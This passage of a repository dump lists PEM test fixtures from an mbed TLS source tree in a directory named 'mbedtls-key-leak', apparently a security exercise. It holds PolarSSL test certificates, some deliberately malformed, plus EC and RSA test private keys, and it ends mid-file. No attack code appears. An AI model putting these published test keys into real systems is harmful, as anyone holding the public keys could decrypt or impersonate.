MAkGA1UdEwQCMAAwHQYDVR0OBBYEFNIK06V3H85VsFxGoo5zbL+hYCa7MGYGA1Ud 9 | IwRfMF2AFDh32Gt3nCh3gotO2BupHveUFrcOoUKkQDA+MQswCQYDVQQGEwJOTDER 10 | MA8GA1UEChMIUG9sYXJTU0wxHDAaBgNVBAMTE1BvbGFyc3NsIFRlc3QgRUMgQ0GC 11 | AQ4wDQYJKoZIhvcNAQELBQADggIBADRoQ5fHKw+vkl0D3aqLX1XrZidb+25AWbhr 12 | FYXdaskN219PrXBL3cV8x5tK6qsPKSyyw1lue80OmhXs/w7PJkOHHUSWRnmTv7lr 13 | 8Us3Zr/yOF/VVqzdGs7DlOTpyzEBdugI9uar/aCqHDoltN8wOduOoQB9aojYpROj 14 | +gjlEO0mgt/87XpjYOig1o0jv44QYDQZQzpj1zeIn6WMe6xk9YDwCLMjRIpg++c7 15 | QyxvcEJTn80wX1SaEBM2gau97G7bORLMwBVkMT4oSY+iKYgpPpawOnMJbqUP73Dm 16 | yfJExDdrW/BbWZ/vKIcSqSZIbkHdkNjUDVHczyVwQxZxzvLFw/B1k9s7jYFsi5eK 17 | TNAdXFa4et1H2sd+uhu24GxsjmJioDrftixcgzPVBjDCjH8QWkBEX292WJ58on0e 18 | deWLpZUnzPdE1B4rsiPw1Vg28mGgr2O1xgBQr/fx6A+8ItNTzAXbZfEcult9ypwM 19 | 0b6YDNe5IvdKk8iwz3mof0VNy47K6xoCaE/fxxWkjoXK8x2wfswGeP2QgUzQE93b 20 | OtjdHpsG1c7gIVFQmKATyAPUz4vqmezgNRleXU0oL0PYtoCmKQ51UjNMUfmO9xCj 21 | VJaNa2iTQ5Dgic+CW4TYAgj5/9g9X3WfwnDNxrZ0UxxawGElczHXqbrNleTtPaKp 22 | a8Si6UK5 23 | -----END CERTIFICATE----- 24 | -------------------------------------------------------------------------------- /mbedtls-key-leak/mbedtls/tests/data_files/server7.key: -------------------------------------------------------------------------------- 1 | -----BEGIN EC PRIVATE KEY----- 2 | MHcCAQEEILBDMs7bRVxVg6ovTpf2zB9m+22jY7R3LNKRvCPfa6YJoAoGCCqGSM49 3 | AwEHoUQDQgAEHG336dql6qGcsnIZqAkcc63eFbvepuOzTwXobRAuOmk3l4A5wXX/ 4 | vs5wAawLX1wUTUM/AESHmAZrJK9tq5So8g== 5 | -----END EC PRIVATE KEY----- 6 | -------------------------------------------------------------------------------- /mbedtls-key-leak/mbedtls/tests/data_files/server8.crt: -------------------------------------------------------------------------------- 1 | -----BEGIN CERTIFICATE----- 2 | MIIC6zCCAnKgAwIBAgIBETAKBggqhkjOPQQDAjBLMQswCQYDVQQGEwJOTDERMA8G 3 | A1UEChMIUG9sYXJTU0wxKTAnBgNVBAMTIFBvbGFyU1NMIFRlc3QgSW50ZXJtZWRp 4 | YXRlIEVDIENBMB4XDTEzMDkyNDE2MTI1NloXDTIzMDkyMjE2MTI1NlowNDELMAkG 5 | A1UEBhMCTkwxETAPBgNVBAoTCFBvbGFyU1NMMRIwEAYDVQQDEwlsb2NhbGhvc3Qw 6 | ggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQDbHH8uC82/ztF1EKCiuM59 7 | quIF4HrYRGOPtb3AsBm5N7gZSg7xXXSAZ0aHBt5bfwYDvcGNXgcV1Fv03OXPPfnB 8 | ESyuarmKvR1nZhfqTr3bFZqCh+TweMOjhYew/Z+pmV/jM+zM6gu1YV7xSX4/oy3q 9 | AQzMQpp2m8TQN9OxFwFhARZZfhwXw1P90XLLTGAV2n3i6q1Q747ii9Rqd1XWcNlr 10 | u/HuOQQ4o73i0eBma+KcR5npKOa2/C7KZ0OE6NWD1p2YawE+gdw8esr585z31igb 11 | J3h8w9DVY6eBNImtJWq98urt+lf85TTGwQ9xLdIIEButREHg/nmgY5OKsV3psO5v 12 | AgMBAAGjgZIwgY8wCQYDVR0TBAIwADAdBgNVHQ4EFgQU4j/mLfTnuKaM3G0XpxhA 13 | J2F2Dx0wYwYDVR0jBFwwWoAUD4m9Y0Hry14XKP9oMD3BiNCcWDmhP6Q9MDsxCzAJ 14 | BgNVBAYTAk5MMREwDwYDVQQKEwhQb2xhclNTTDEZMBcGA1UEAxMQUG9sYXJTU0wg 15 | VGVzdCBDQYIBDzAKBggqhkjOPQQDAgNnADBkAjBkP1bGlZvxnYySZjdBq4m8lkyz 16 | 2cjfqjYs8COEkRkONaVz7888HvFdGpL98uQeFvECMHCyCrHprkGzvq/L9kUnx9Bh 17 | 2IHbCzbbi9moYC1XcOxgfsEKmhtVF/uQdf8+3VtGqA== 18 | -----END CERTIFICATE----- 19 | -------------------------------------------------------------------------------- /mbedtls-key-leak/mbedtls/tests/data_files/server9-bad-mgfhash.crt: -------------------------------------------------------------------------------- 1 | -----BEGIN CERTIFICATE----- 2 | MIIDWzCCAhKgAwIBAgIBGDA+BgkqhkiG9w0BAQowMaANMAsGCWCGSAFlAwQCAaEa 3 | MBgGCSqGSIb3DQEBCDALBglghkgBZQMEAgSiBAICAN4wOzELMAkGA1UEBhMCTkwx 4 | ETAPBgNVBAoTCFBvbGFyU1NMMRkwFwYDVQQDExBQb2xhclNTTCBUZXN0IENBMB4X 5 | DTE0MDEyMDEzNTc0NVoXDTI0MDExODEzNTc0NVowNDELMAkGA1UEBhMCTkwxETAP 6 | BgNVBAoTCFBvbGFyU1NMMRIwEAYDVQQDEwlsb2NhbGhvc3QwgZ8wDQYJKoZIhvcN 7 | AQEBBQADgY0AMIGJAoGBAN0Rip+ZurBoyirqO2ptWZftTslU5A3uzqB9oB6q6A7C 8 | uxNA24oSjokTJKXF9frY9ZDXyMrLxf6THa/aEiNzUnlGGrqgVyt2FjGzqK/nOJsI 9 | i2OZOgol7kXSGFi6uZMa7dRYmmMbN/z3FAifhWVJ81kybdHg6G3eUu1mtKkL2kCV 10 | AgMBAAGjgZIwgY8wCQYDVR0TBAIwADAdBgNVHQ4EFgQU7vPH9R8VpU1HicHTImOy 11 | 36fOvVEwYwYDVR0jBFwwWoAUtFrkpbPe0lL2udWmlQ/rPrzH/f+hP6Q9MDsxCzAJ 12 | BgNVBAYTAk5MMREwDwYDVQQKEwhQb2xhclNTTDEZMBcGA1UEAxMQUG9sYXJTU0wg 13 | VGVzdCBDQYIBADA+BgkqhkiG9w0BAQowMaANMAsGCWCGSAFlAwQCAaEaMBgGCSqG 14 | SIb3DQEBCDALBglghkgBZQMEAgSiBAICAN4DggEBAIfliohNjz4CLGbHWgWRBFQ3 15 | Difn027ZnULTvokT67ii1sJzESzqaIakyyu8GRwfoFRNh/rbGfe4C6e9SkwKbnDg 16 | WE9SWbK6ukIQbMy69C+CVqFlRUHbONw/dmcneAWyZYGx/2Sf4D5kkpIWNDBeKuaV 17 | H69XPZCeN3QAACmdAfo4NYW0I69a1OSaUrTyGT1nBOrzQ8Y0aJBnCJAte49bhQEW 18 | KJv0kMj+8ZG1X0RoSdklf3GqdLUbsfJ2txu14GGAxy4C1gl2JWzoBHN5LMLf0cZ9 19 | uEYui7N/5bkSv8KXdbGvSzgn6zZ0MiCJMiiGEf0L1FxBiBCVsK4C2idpiZH+e28= 20 | -----END CERTIFICATE----- 21 | -------------------------------------------------------------------------------- /mbedtls-key-leak/mbedtls/tests/data_files/server9-bad-saltlen.crt: -------------------------------------------------------------------------------- 1 | -----BEGIN CERTIFICATE----- 2 | MIIDWzCCAhKgAwIBAgIBGDA+BgkqhkiG9w0BAQowMaANMAsGCWCGSAFlAwQCAaEa 3 | MBgGCSqGSIb3DQEBCDALBglghkgBZQMEAgGiBAICAN4wOzELMAkGA1UEBhMCTkwx 4 | ETAPBgNVBAoTCFBvbGFyU1NMMRkwFwYDVQQDExBQb2xhclNTTCBUZXN0IENBMB4X 5 | DTE0MDEyMDEzNTc0NVoXDTI0MDExODEzNTc0NVowNDELMAkGA1UEBhMCTkwxETAP 6 | BgNVBAoTCFBvbGFyU1NMMRIwEAYDVQQDEwlsb2NhbGhvc3QwgZ8wDQYJKoZIhvcN 7 | AQEBBQADgY0AMIGJAoGBAN0Rip+ZurBoyirqO2ptWZftTslU5A3uzqB9oB6q6A7C 8 | uxNA24oSjokTJKXF9frY9ZDXyMrLxf6THa/aEiNzUnlGGrqgVyt2FjGzqK/nOJsI 9 | i2OZOgol7kXSGFi6uZMa7dRYmmMbN/z3FAifhWVJ81kybdHg6G3eUu1mtKkL2kCV 10 | AgMBAAGjgZIwgY8wCQYDVR0TBAIwADAdBgNVHQ4EFgQU7vPH9R8VpU1HicHTImOy 11 | 36fOvVEwYwYDVR0jBFwwWoAUtFrkpbPe0lL2udWmlQ/rPrzH/f+hP6Q9MDsxCzAJ 12 | BgNVBAYTAk5MMREwDwYDVQQKEwhQb2xhclNTTDEZMBcGA1UEAxMQUG9sYXJTU0wg 13 | VGVzdCBDQYIBADA+BgkqhkiG9w0BAQowMaANMAsGCWCGSAFlAwQCAaEaMBgGCSqG 14 | SIb3DQEBCDALBglghkgBZQMEAgGiBAICAN4DggEBAE7T54cyUf0ByNr34JaojFam 15 | hV0T9QSc4wJ17sX67rxYIorXU8MynaneJzFxD9utOD3dq2TON18VswhT2McDgefl 16 | XMwivCC0nWod8Pk638QaHxbaqC7XSq0QRBfOMXwV7knLNxI8smc9UJaco39VEcGD 17 | yCkq4By/VCWTpvJ+1hx4zZ8WoXpFJFM5m5y9oEz4lgNv/6Wu7ILztyOk2yJiSR8r 18 | YooC4zVeUOZuDO6At/NXZuSvmKmr+tfFrFA1AA/7yR5odQbqFVNSJ+u0x1Jv8Ra6 19 | JXA4cXsnaDaRe+Wm0L0p+2PtQWXE5npXYIbFHAA9EOC3Ab8oaP9M/F6yQMa/2is= 20 | -----END CERTIFICATE----- 21 | -------------------------------------------------------------------------------- /mbedtls-key-leak/mbedtls/tests/data_files/server9-badsign.crt: -------------------------------------------------------------------------------- 1 | -----BEGIN CERTIFICATE----- 2 | MIIDBTCCAeegAwIBAgIBFjATBgkqhkiG9w0BAQowBqIEAgIA6jA7MQswCQYDVQQG 3 | EwJOTDERMA8GA1UEChMIUG9sYXJTU0wxGTAXBgNVBAMTEFBvbGFyU1NMIFRlc3Qg 4 | Q0EwHhcNMTQwMTIwMTMzODE2WhcNMjQwMTE4MTMzODE2WjA0MQswCQYDVQQGEwJO 5 | TDERMA8GA1UEChMIUG9sYXJTU0wxEjAQBgNVBAMTCWxvY2FsaG9zdDCBnzANBgkq 6 | hkiG9w0BAQEFAAOBjQAwgYkCgYEA3RGKn5m6sGjKKuo7am1Zl+1OyVTkDe7OoH2g 7 | HqroDsK7E0DbihKOiRMkpcX1+tj1kNfIysvF/pMdr9oSI3NSeUYauqBXK3YWMbOo 8 | r+c4mwiLY5k6CiXuRdIYWLq5kxrt1FiaYxs3/PcUCJ+FZUnzWTJt0eDobd5S7Wa0 9 | qQvaQJUCAwEAAaOBkjCBjzAJBgNVHRMEAjAAMB0GA1UdDgQWBBTu88f1HxWlTUeJ 10 | wdMiY7Lfp869UTBjBgNVHSMEXDBagBS0WuSls97SUva51aaVD+s+vMf9/6E/pD0w 11 | OzELMAkGA1UEBhMCTkwxETAPBgNVBAoTCFBvbGFyU1NMMRkwFwYDVQQDExBQb2xh 12 | clNTTCBUZXN0IENBggEAMBMGCSqGSIb3DQEBCjAGogQCAgDqA4IBAQDAog/jXydR 13 | vDIugTzBXtfVK0CEX8iyQ4cVzQmXWSne8204v943K5D2hktSBkjdQUdcnVvVgLR6 14 | te50jV89ptN/NofX+fo9fhSRN9vGgQVWzOOFiO0zcThy749pirJu1Kq5OJdthIyW 15 | Pu0UCz5G0k3kTp0JPevGlsNc8S9Ak1tFuB0IPJjrbfODWHS2LDuO+dB6gpkNTdrj 16 | 88ogYtBsN4D5gsXBRUfobXokUwejBwLrD6XwyQx+0bMwSCxgHEhxvuUkx1vdlXGw 17 | JG3aF92u8mIxoKSAPaPdqy930mQvmpUWcN5Y1IMbtEGoQCKMYgosFcazJpJcjnX1 18 | o4Hl/lqjwCFG 19 | -----END CERTIFICATE----- 20 | -------------------------------------------------------------------------------- /mbedtls-key-leak/mbedtls/tests/data_files/server9-defaults.crt: -------------------------------------------------------------------------------- 1 | -----BEGIN CERTIFICATE----- 2 | MIIDBjCCAe6gAwIBAgIBSDANBgkqhkiG9w0BAQowADA7MQswCQYDVQQGEwJOTDER 3 | MA8GA1UEChMIUG9sYXJTU0wxGTAXBgNVBAMTEFBvbGFyU1NMIFRlc3QgQ0EwHhcN 4 | MTQwNjA1MTU1NjUzWhcNMjQwNjAyMTU1NjUzWjA0MQswCQYDVQQGEwJOTDERMA8G 5 | A1UEChMIUG9sYXJTU0wxEjAQBgNVBAMTCWxvY2FsaG9zdDCBnzANBgkqhkiG9w0B 6 | AQEFAAOBjQAwgYkCgYEA3RGKn5m6sGjKKuo7am1Zl+1OyVTkDe7OoH2gHqroDsK7 7 | E0DbihKOiRMkpcX1+tj1kNfIysvF/pMdr9oSI3NSeUYauqBXK3YWMbOor+c4mwiL 8 | Y5k6CiXuRdIYWLq5kxrt1FiaYxs3/PcUCJ+FZUnzWTJt0eDobd5S7Wa0qQvaQJUC 9 | AwEAAaOBnzCBnDAJBgNVHRMEAjAAMB0GA1UdDgQWBBTu88f1HxWlTUeJwdMiY7Lf 10 | p869UTBjBgNVHSMEXDBagBS0WuSls97SUva51aaVD+s+vMf9/6E/pD0wOzELMAkG 11 | A1UEBhMCTkwxETAPBgNVBAoTCFBvbGFyU1NMMRkwFwYDVQQDExBQb2xhclNTTCBU 12 | ZXN0IENBggEAMAsGA1UdDwQEAwIFoDANBgkqhkiG9w0BAQowAAOCAQEAGUdim4uy 13 | /rBDFMF8qhjH1qsv0o8ON4HgP3YXbdKdIMfd+p5KtoqHQnrkixWxaIvfORnR4mGm 14 | f8H5BimwIkNLxy7zS88TVDOYel8g7B2yl0nq4biki83NStNBYZJjxKT0ud5O5mGd 15 | jHdy9vTEc7h8q+SHzRdgpNFXyKY5OQYng1LHco8h1UR8/nmPMuDtocHMnmMXu68a 16 | 69+TtZxx90/V4gJZOoL1iCi8HEsKoJzm/L8ji54OYt7FxgFfE3VmLsXeMaWYO8GS 17 | BUxh5kqZ25O8hQXK5ywfuVK83Do/SsoClbgx9mboybseGVFIJaxs9e66GFDMoI3B 18 | 09JqWv4DoLNnwg== 19 | -----END CERTIFICATE----- 20 | -------------------------------------------------------------------------------- /mbedtls-key-leak/mbedtls/tests/data_files/server9-sha224.crt: -------------------------------------------------------------------------------- 1 | -----BEGIN CERTIFICATE----- 2 | MIIDWzCCAhKgAwIBAgIBFzA+BgkqhkiG9w0BAQowMaANMAsGCWCGSAFlAwQCBKEa 3 | MBgGCSqGSIb3DQEBCDALBglghkgBZQMEAgSiBAICAOIwOzELMAkGA1UEBhMCTkwx 4 | ETAPBgNVBAoTCFBvbGFyU1NMMRkwFwYDVQQDExBQb2xhclNTTCBUZXN0IENBMB4X 5 | DTE0MDEyMDEzNTczNloXDTI0MDExODEzNTczNlowNDELMAkGA1UEBhMCTkwxETAP 6 | BgNVBAoTCFBvbGFyU1NMMRIwEAYDVQQDEwlsb2NhbGhvc3QwgZ8wDQYJKoZIhvcN 7 | AQEBBQADgY0AMIGJAoGBAN0Rip+ZurBoyirqO2ptWZftTslU5A3uzqB9oB6q6A7C 8 | uxNA24oSjokTJKXF9frY9ZDXyMrLxf6THa/aEiNzUnlGGrqgVyt2FjGzqK/nOJsI 9 | i2OZOgol7kXSGFi6uZMa7dRYmmMbN/z3FAifhWVJ81kybdHg6G3eUu1mtKkL2kCV 10 | AgMBAAGjgZIwgY8wCQYDVR0TBAIwADAdBgNVHQ4EFgQU7vPH9R8VpU1HicHTImOy 11 | 36fOvVEwYwYDVR0jBFwwWoAUtFrkpbPe0lL2udWmlQ/rPrzH/f+hP6Q9MDsxCzAJ 12 | BgNVBAYTAk5MMREwDwYDVQQKEwhQb2xhclNTTDEZMBcGA1UEAxMQUG9sYXJTU0wg 13 | VGVzdCBDQYIBADA+BgkqhkiG9w0BAQowMaANMAsGCWCGSAFlAwQCBKEaMBgGCSqG 14 | SIb3DQEBCDALBglghkgBZQMEAgSiBAICAOIDggEBADJExjfWWvL28lgj+GGgviqo 15 | PHZLxI0pLQUnFJQ9Kpu6jxfICseBF00Z6BJE/RcYDpIie5GDt/8u/i6xB6Li29Pm 16 | g5nANgd/Y3fFnW7d0ydVjiSnetlPuf/jTlWQl6mQTH2xqYu8J8d3JRxQdRiDYbVm 17 | uywW2d6rksiqm6dPD5l4A5DcemcYo8f/1Ifj5WNDCV8/OHex+AnW2ccDvWAnVgSR 18 | B2VpOXJzVFuBsuf4tGVm/2TUMSB6NcvFc6TeJk1kzbZxii4QjKXtH1SfrVP59iEe 19 | l17NYAEWARjBpQWBiutRG+QM2et0sNiUBuWxTkvd0eSgencNysVAOsZqrqaX3CY= 20 | -----END CERTIFICATE----- 21 | -------------------------------------------------------------------------------- /mbedtls-key-leak/mbedtls/tests/data_files/server9-sha256.crt: -------------------------------------------------------------------------------- 1 | -----BEGIN CERTIFICATE----- 2 | MIIDWzCCAhKgAwIBAgIBGDA+BgkqhkiG9w0BAQowMaANMAsGCWCGSAFlAwQCAaEa 3 | MBgGCSqGSIb3DQEBCDALBglghkgBZQMEAgGiBAICAN4wOzELMAkGA1UEBhMCTkwx 4 | ETAPBgNVBAoTCFBvbGFyU1NMMRkwFwYDVQQDExBQb2xhclNTTCBUZXN0IENBMB4X 5 | DTE0MDEyMDEzNTc0NVoXDTI0MDExODEzNTc0NVowNDELMAkGA1UEBhMCTkwxETAP 6 | BgNVBAoTCFBvbGFyU1NMMRIwEAYDVQQDEwlsb2NhbGhvc3QwgZ8wDQYJKoZIhvcN 7 | AQEBBQADgY0AMIGJAoGBAN0Rip+ZurBoyirqO2ptWZftTslU5A3uzqB9oB6q6A7C 8 | uxNA24oSjokTJKXF9frY9ZDXyMrLxf6THa/aEiNzUnlGGrqgVyt2FjGzqK/nOJsI 9 | i2OZOgol7kXSGFi6uZMa7dRYmmMbN/z3FAifhWVJ81kybdHg6G3eUu1mtKkL2kCV 10 | AgMBAAGjgZIwgY8wCQYDVR0TBAIwADAdBgNVHQ4EFgQU7vPH9R8VpU1HicHTImOy 11 | 36fOvVEwYwYDVR0jBFwwWoAUtFrkpbPe0lL2udWmlQ/rPrzH/f+hP6Q9MDsxCzAJ 12 | BgNVBAYTAk5MMREwDwYDVQQKEwhQb2xhclNTTDEZMBcGA1UEAxMQUG9sYXJTU0wg 13 | VGVzdCBDQYIBADA+BgkqhkiG9w0BAQowMaANMAsGCWCGSAFlAwQCAaEaMBgGCSqG 14 | SIb3DQEBCDALBglghkgBZQMEAgGiBAICAN4DggEBAH0+knqkcLaxeDkenBQgd4Qg 15 | 3ZyAhtpiLU689mw+3cXB/uzFrCIxEL5aGh1eSj+DszB+FtsZ06ux7JVQqVOA2Wm9 16 | yLxC6wF8OOYj0nBa91BWLhRAHLhmIdWsVk7Hl9KojZd4TwV2N+ZEV/BLxyoRvK4H 17 | V4xCpzgDSiTPe8Etk4r+0akbr6bsOUBayPb7MGLHubZKq8NsFAmmynp+fPmHd3SE 18 | 0ooJdiZ1MmKPKLE5Og/hXCI8qeiXQUR6oQ7b2XONsrI2HIj2SA9dA5qmHwE5PbMu 19 | zqxQ3R83boqLXbkFORn+UiYLmffqdoWuNy00BHMCrxRA9DUv+WyN4npLMF8rOJw= 20 | -----END CERTIFICATE----- 21 | -------------------------------------------------------------------------------- /mbedtls-key-leak/mbedtls/tests/data_files/server9-sha384.crt: -------------------------------------------------------------------------------- 1 | -----BEGIN CERTIFICATE----- 2 | MIIDWzCCAhKgAwIBAgIBGTA+BgkqhkiG9w0BAQowMaANMAsGCWCGSAFlAwQCAqEa 3 | MBgGCSqGSIb3DQEBCDALBglghkgBZQMEAgKiBAICAM4wOzELMAkGA1UEBhMCTkwx 4 | ETAPBgNVBAoTCFBvbGFyU1NMMRkwFwYDVQQDExBQb2xhclNTTCBUZXN0IENBMB4X 5 | DTE0MDEyMDEzNTc1OFoXDTI0MDExODEzNTc1OFowNDELMAkGA1UEBhMCTkwxETAP 6 | BgNVBAoTCFBvbGFyU1NMMRIwEAYDVQQDEwlsb2NhbGhvc3QwgZ8wDQYJKoZIhvcN 7 | AQEBBQADgY0AMIGJAoGBAN0Rip+ZurBoyirqO2ptWZftTslU5A3uzqB9oB6q6A7C 8 | uxNA24oSjokTJKXF9frY9ZDXyMrLxf6THa/aEiNzUnlGGrqgVyt2FjGzqK/nOJsI 9 | i2OZOgol7kXSGFi6uZMa7dRYmmMbN/z3FAifhWVJ81kybdHg6G3eUu1mtKkL2kCV 10 | AgMBAAGjgZIwgY8wCQYDVR0TBAIwADAdBgNVHQ4EFgQU7vPH9R8VpU1HicHTImOy 11 | 36fOvVEwYwYDVR0jBFwwWoAUtFrkpbPe0lL2udWmlQ/rPrzH/f+hP6Q9MDsxCzAJ 12 | BgNVBAYTAk5MMREwDwYDVQQKEwhQb2xhclNTTDEZMBcGA1UEAxMQUG9sYXJTU0wg 13 | VGVzdCBDQYIBADA+BgkqhkiG9w0BAQowMaANMAsGCWCGSAFlAwQCAqEaMBgGCSqG 14 | SIb3DQEBCDALBglghkgBZQMEAgKiBAICAM4DggEBABf8Gyq2VYuN1EBW1nOapDQp 15 | B/KuafNW2GEJ7FmQKNyA7MIj1Yqo2MtJ6/OQojRQ3F5rnO4yjmvIPsXeQaMxJBiI 16 | aaoAlLpH++F+oXMq/0aS0WSZrSLrsh2Fpay9cBDGwek2rDOX9kM+ZcPzGitVwWKX 17 | TnOW22hpcl7u95CpZH+JZTcto5nL3tTyV9pIy+tSKQQfjPB+G0TAZCsOkbCGPLug 18 | qdjvqFQwOf15VxQMj7NRiXjlqJvsx+I7B2AIhrs4DzQMEyiWq9S/PzpQuFU5v/Kg 19 | s2iMLJ5ygv5aN3PYqGlE1ZmvgyRp5h/LaTGI2L6lzRTnecOhtPv30N2tyaDAEfo= 20 | -----END CERTIFICATE----- 21 | -------------------------------------------------------------------------------- /mbedtls-key-leak/mbedtls/tests/data_files/server9-sha512.crt: -------------------------------------------------------------------------------- 1 | -----BEGIN CERTIFICATE----- 2 | MIIDWzCCAhKgAwIBAgIBGjA+BgkqhkiG9w0BAQowMaANMAsGCWCGSAFlAwQCA6Ea 3 | MBgGCSqGSIb3DQEBCDALBglghkgBZQMEAgOiBAICAL4wOzELMAkGA1UEBhMCTkwx 4 | ETAPBgNVBAoTCFBvbGFyU1NMMRkwFwYDVQQDExBQb2xhclNTTCBUZXN0IENBMB4X 5 | DTE0MDEyMDEzNTgxMloXDTI0MDExODEzNTgxMlowNDELMAkGA1UEBhMCTkwxETAP 6 | BgNVBAoTCFBvbGFyU1NMMRIwEAYDVQQDEwlsb2NhbGhvc3QwgZ8wDQYJKoZIhvcN 7 | AQEBBQADgY0AMIGJAoGBAN0Rip+ZurBoyirqO2ptWZftTslU5A3uzqB9oB6q6A7C 8 | uxNA24oSjokTJKXF9frY9ZDXyMrLxf6THa/aEiNzUnlGGrqgVyt2FjGzqK/nOJsI 9 | i2OZOgol7kXSGFi6uZMa7dRYmmMbN/z3FAifhWVJ81kybdHg6G3eUu1mtKkL2kCV 10 | AgMBAAGjgZIwgY8wCQYDVR0TBAIwADAdBgNVHQ4EFgQU7vPH9R8VpU1HicHTImOy 11 | 36fOvVEwYwYDVR0jBFwwWoAUtFrkpbPe0lL2udWmlQ/rPrzH/f+hP6Q9MDsxCzAJ 12 | BgNVBAYTAk5MMREwDwYDVQQKEwhQb2xhclNTTDEZMBcGA1UEAxMQUG9sYXJTU0wg 13 | VGVzdCBDQYIBADA+BgkqhkiG9w0BAQowMaANMAsGCWCGSAFlAwQCA6EaMBgGCSqG 14 | SIb3DQEBCDALBglghkgBZQMEAgOiBAICAL4DggEBACdVozFq6rUiXo+ib5Y2oPsR 15 | 6xxl4Ydn3LpUoYrPpTOrhcXJWW/tOLHGuCF/mSRfUzKaMIfL418cZHYnvumvuttu 16 | 6z3tp5E1VsiZCU2MWJnzjKSxFBOss43AmpJHHoapGFZu2pxObBPqegAKHYkKWOLk 17 | tJDj47PurWgEek9j1nL7Pc1tVf59fm/ySp4fWkXLLvQiKid1516VioLyacUvK3zU 18 | 6Egz8jMt7D5c9KpaExLRTANVsThqO5/dmR36bOwm3Hpbde7DNdgxru41tiLMqJs/ 19 | 5pX3ceaJ1XQ/l0idj5/9ipvqHHUguyk7H22HwQHQdSD9oIha8kEM3P6CjpfE7yY= 20 | -----END CERTIFICATE----- 21 | -------------------------------------------------------------------------------- /mbedtls-key-leak/mbedtls/tests/data_files/server9.crt: -------------------------------------------------------------------------------- 1 | -----BEGIN CERTIFICATE----- 2 | MIIDBTCCAeegAwIBAgIBFjATBgkqhkiG9w0BAQowBqIEAgIA6jA7MQswCQYDVQQG 3 | EwJOTDERMA8GA1UEChMIUG9sYXJTU0wxGTAXBgNVBAMTEFBvbGFyU1NMIFRlc3Qg 4 | Q0EwHhcNMTQwMTIwMTMzODE2WhcNMjQwMTE4MTMzODE2WjA0MQswCQYDVQQGEwJO 5 | TDERMA8GA1UEChMIUG9sYXJTU0wxEjAQBgNVBAMTCWxvY2FsaG9zdDCBnzANBgkq 6 | hkiG9w0BAQEFAAOBjQAwgYkCgYEA3RGKn5m6sGjKKuo7am1Zl+1OyVTkDe7OoH2g 7 | HqroDsK7E0DbihKOiRMkpcX1+tj1kNfIysvF/pMdr9oSI3NSeUYauqBXK3YWMbOo 8 | r+c4mwiLY5k6CiXuRdIYWLq5kxrt1FiaYxs3/PcUCJ+FZUnzWTJt0eDobd5S7Wa0 9 | qQvaQJUCAwEAAaOBkjCBjzAJBgNVHRMEAjAAMB0GA1UdDgQWBBTu88f1HxWlTUeJ 10 | wdMiY7Lfp869UTBjBgNVHSMEXDBagBS0WuSls97SUva51aaVD+s+vMf9/6E/pD0w 11 | OzELMAkGA1UEBhMCTkwxETAPBgNVBAoTCFBvbGFyU1NMMRkwFwYDVQQDExBQb2xh 12 | clNTTCBUZXN0IENBggEAMBMGCSqGSIb3DQEBCjAGogQCAgDqA4IBAQDAog/jXydR 13 | vDIugTzBXtfVK0CEX8iyQ4cVzQmXWSne8204v943K5D2hktSBkjdQUdcnVvVgLR6 14 | te50jV89ptN/NofX+fo9fhSRN9vGgQVWzOOFiO0zcThy749pirJu1Kq5OJdthIyW 15 | Pu0UCz5G0k3kTp0JPevGlsNc8S9Ak1tFuB0IPJjrbfODWHS2LDuO+dB6gpkNTdrj 16 | 88ogYtBsN4D5gsXBRUfobXokUwejBwLrD6XwyQx+0bMwSCxgHEhxvuUkx1vdlXGw 17 | JG3aF92u8mIxoKSAPaPdqy930mQvmpUWcN5Y1IMbtEGoQCKMYgosFcazJpJcjnX1 18 | o4Hl/lqjwCEG 19 | -----END CERTIFICATE----- 20 | -------------------------------------------------------------------------------- /mbedtls-key-leak/mbedtls/tests/data_files/server9.key: -------------------------------------------------------------------------------- 1 | -----BEGIN RSA PRIVATE KEY----- 2 | MIICXQIBAAKBgQDdEYqfmbqwaMoq6jtqbVmX7U7JVOQN7s6gfaAequgOwrsTQNuK 3 | Eo6JEySlxfX62PWQ18jKy8X+kx2v2hIjc1J5Rhq6oFcrdhYxs6iv5zibCItjmToK 4 | Je5F0hhYurmTGu3UWJpjGzf89xQIn4VlSfNZMm3R4Oht3lLtZrSpC9pAlQIDAQAB 5 | AoGAHFCE2tBL0xB45Go/1e/Pi9//OVZAJ3Cw0mmEuqjVNB7I6zxhYhviWbgz92+V 6 | g92KBlU9CIx0/ZhGMyHRNO0uYNEZUJyM8zItoo/nmU31+VaHOGgpei04HZrn1Nmw 7 | QS01FVrn9wzKR/5qeEBmxE7rVMDQo8QLnllC3jXzIVUtX4ECQQD2g9dleWYbqIQe 8 | Q9paXxzvODhCzNtQwD0PnOKc54Nu4zm3JI45REtunmG8et+Ncms9RycTjNlWPGJT 9 | 62jgaJexAkEA5ZMNv4u9NNRfZprmlNyvjSOf+w7fdKzhcnkHbGkfLnFdc7vq0XFC 10 | nwORsdjpOvWQUwrV2Cw8Pl4rKa4B4iqUJQJBAMVti6maU3udN8qhXxP3js3LwctG 11 | E/OVMpH5fMha5jl9w/B4V2tn1d3O/MmdwsKeu2JFRPd0W2+kRr+dDs6DFdECQQC1 12 | 3g9QJRWY2n1RPXlZiJKSDxzXuOqQ9bwMAZE98vE+y5Qq8T2O+li6vAsZhysNCChz 13 | gOvzuudmyRcMh8r6Lpz5AkAUKK3gYtJFiVH2arRig3JjZJqixgSTolMT1n+HG4uM 14 | tnBqBiEBVwBxEqaohla/rHR5joZCdcDN8xq0yeTQyLH9 15 | -----END RSA PRIVATE KEY----- 16 | -------------------------------------------------------------------------------- /mbedtls-key-leak/mbedtls/tests/data_files/server9.req.sha1: -------------------------------------------------------------------------------- 1 | -----BEGIN CERTIFICATE REQUEST----- 2 | MIIBojCCAQYCAQAwNDELMAkGA1UEBhMCTkwxETAPBgNVBAoTCFBvbGFyU1NMMRIw 3 | EAYDVQQDEwlsb2NhbGhvc3QwgZ8wDQYJKoZIhvcNAQEBBQADgY0AMIGJAoGBAN0R 4 | ip+ZurBoyirqO2ptWZftTslU5A3uzqB9oB6q6A7CuxNA24oSjokTJKXF9frY9ZDX 5 | yMrLxf6THa/aEiNzUnlGGrqgVyt2FjGzqK/nOJsIi2OZOgol7kXSGFi6uZMa7dRY 6 | mmMbN/z3FAifhWVJ81kybdHg6G3eUu1mtKkL2kCVAgMBAAGgKTAnBgkqhkiG9w0B 7 | CQ4xGjAYMAkGA1UdEwQCMAAwCwYDVR0PBAQDAgXgMBIGCSqGSIb3DQEBCjAFogMC 8 | 